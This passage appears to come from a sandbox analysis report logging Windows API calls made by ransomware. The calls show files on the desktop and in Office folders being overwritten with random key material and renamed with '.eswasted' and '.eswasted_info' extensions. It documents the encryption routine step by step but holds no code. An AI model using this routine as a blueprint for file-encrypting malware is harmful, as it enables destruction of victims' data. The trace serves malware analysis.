phProv=0x114fe0c*=0x70f058) returned 1 [0072.308] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0072.308] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.308] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0072.308] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2aa) returned 0x6f65b8 [0072.308] lstrcpyW (in: lpString1=0x6f6658, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.308] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0072.308] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0072.309] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0072.309] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.309] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0072.310] WriteFile (in: hFile=0x108, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.311] SetEndOfFile (hFile=0x108) returned 1 [0072.311] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.311] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.311] lstrcpyW (in: lpString1=0x6f6658, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.311] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.eswasted")) returned 1 [0072.342] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0072.342] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0072.343] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x1915 [0072.343] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1915) returned 0x330000 [0072.343] CloseHandle (hObject=0x130) returned 1 [0072.346] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0072.347] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.347] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.347] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0072.348] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0072.348] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.360] SetEndOfFile (hFile=0x108) returned 1 [0072.367] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.367] CloseHandle (hObject=0x108) returned 1 [0072.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f65b8 | out: hHeap=0x6d0000) returned 1 [0072.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312aa0 | out: hHeap=0x6d0000) returned 1 [0072.405] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0072.406] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0072.406] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.406] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0072.406] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c0) returned 0x6f5cc0 [0072.407] lstrcpyW (in: lpString1=0x6f5d76, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.407] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0072.407] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0072.408] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0072.408] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.408] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0072.408] WriteFile (in: hFile=0x108, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.410] SetEndOfFile (hFile=0x108) returned 1 [0072.410] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.410] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.410] lstrcpyW (in: lpString1=0x6f5d76, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted")) returned 1 [0072.498] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0072.498] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0072.498] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0xaec3a [0072.498] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaec3a) returned 0x1610000 [0072.499] CloseHandle (hObject=0x130) returned 1 [0072.716] CryptAcquireContextW (phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040) [0072.716] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0072.717] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.717] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.717] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0072.717] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0072.717] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.726] SetEndOfFile (hFile=0x108) returned 1 [0072.728] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.728] CloseHandle (hObject=0x108) returned 1 [0072.730] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0072.730] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312d98 | out: hHeap=0x6d0000) returned 1 [0072.731] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0072.732] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0072.732] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.732] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\00nFwhgO92Uk.jpg") returned 58 [0072.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27e) returned 0x717d98 [0072.732] lstrcpyW (in: lpString1=0x717e0c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0072.732] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0072.733] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0072.733] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.733] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\00nFwhgO92Uk.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\00nfwhgo92uk.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0072.736] WriteFile (in: hFile=0x108, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.737] SetEndOfFile (hFile=0x108) returned 1 [0072.737] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.738] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.738] lstrcpyW (in: lpString1=0x717e0c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\00nFwhgO92Uk.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\00nfwhgo92uk.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\00nFwhgO92Uk.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\00nfwhgo92uk.jpg.eswasted")) returned 1 [0072.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\00nFwhgO92Uk.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\00nfwhgo92uk.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0072.739] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0072.740] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x12376 [0072.740] MapViewOfFile (hFileMappingObject=0x130, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12376) returned 0x330000 [0072.740] CloseHandle (hObject=0x118) returned 1 [0072.745] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0072.746] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.747] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.747] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0072.748] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0072.748] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.756] SetEndOfFile (hFile=0x108) returned 1 [0072.795] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.795] CloseHandle (hObject=0x108) returned 1 [0072.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717d98 | out: hHeap=0x6d0000) returned 1 [0072.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f4fd8 | out: hHeap=0x6d0000) returned 1 [0072.797] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0072.799] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0072.799] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.799] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3OVUBNdm6AgJ.pps") returned 58 [0072.799] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27e) returned 0x717d98 [0072.799] lstrcpyW (in: lpString1=0x717e0c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.799] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0072.799] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0072.800] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0072.800] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3OVUBNdm6AgJ.pps.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3ovubndm6agj.pps.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0072.801] WriteFile (in: hFile=0x108, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.802] SetEndOfFile (hFile=0x108) returned 1 [0072.803] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.803] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.803] lstrcpyW (in: lpString1=0x717e0c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.803] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3OVUBNdm6AgJ.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3ovubndm6agj.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3OVUBNdm6AgJ.pps.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3ovubndm6agj.pps.eswasted")) returned 1 [0072.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3OVUBNdm6AgJ.pps.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3ovubndm6agj.pps.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0072.804] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0072.804] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0xc240 [0072.804] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc240) returned 0x330000 [0072.804] CloseHandle (hObject=0x10c) returned 1 [0072.808] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0072.809] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0072.809] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.809] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0072.810] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0072.810] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.821] SetEndOfFile (hFile=0x108) returned 1 [0072.824] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.824] CloseHandle (hObject=0x108) returned 1 [0072.826] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717d98 | out: hHeap=0x6d0000) returned 1 [0072.826] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c558 | out: hHeap=0x6d0000) returned 1 [0072.826] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0072.827] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0072.827] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.827] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6f3ozAkBxNySU3QQOT\\ObJT.swf") returned 69 [0072.827] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x294) returned 0x717d98 [0072.827] lstrcpyW (in: lpString1=0x717e22, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.827] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0072.827] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0072.828] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0072.828] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6f3ozAkBxNySU3QQOT\\ObJT.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6f3ozakbxnysu3qqot\\objt.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.872] WriteFile (in: hFile=0x11c, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.873] SetEndOfFile (hFile=0x11c) returned 1 [0072.873] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.873] lstrcpyW (in: lpString1=0x717e22, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6f3ozAkBxNySU3QQOT\\ObJT.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6f3ozakbxnysu3qqot\\objt.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6f3ozAkBxNySU3QQOT\\ObJT.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6f3ozakbxnysu3qqot\\objt.swf.eswasted")) returned 1 [0072.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6f3ozAkBxNySU3QQOT\\ObJT.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6f3ozakbxnysu3qqot\\objt.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0072.875] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0072.875] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x4a69 [0072.875] MapViewOfFile (hFileMappingObject=0x130, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4a69) returned 0x330000 [0072.875] CloseHandle (hObject=0x108) returned 1 [0072.877] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0072.878] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.878] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.878] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0072.879] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0072.879] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.888] SetEndOfFile (hFile=0x11c) returned 1 [0072.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.890] CloseHandle (hObject=0x11c) returned 1 [0072.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717d98 | out: hHeap=0x6d0000) returned 1 [0072.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412960 | out: hHeap=0x6d0000) returned 1 [0072.892] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0072.893] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0072.893] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.893] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AEu8.mp4") returned 50 [0072.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x26e) returned 0x717d80 [0072.893] lstrcpyW (in: lpString1=0x717de4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0072.893] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0072.894] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0072.894] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AEu8.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeu8.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 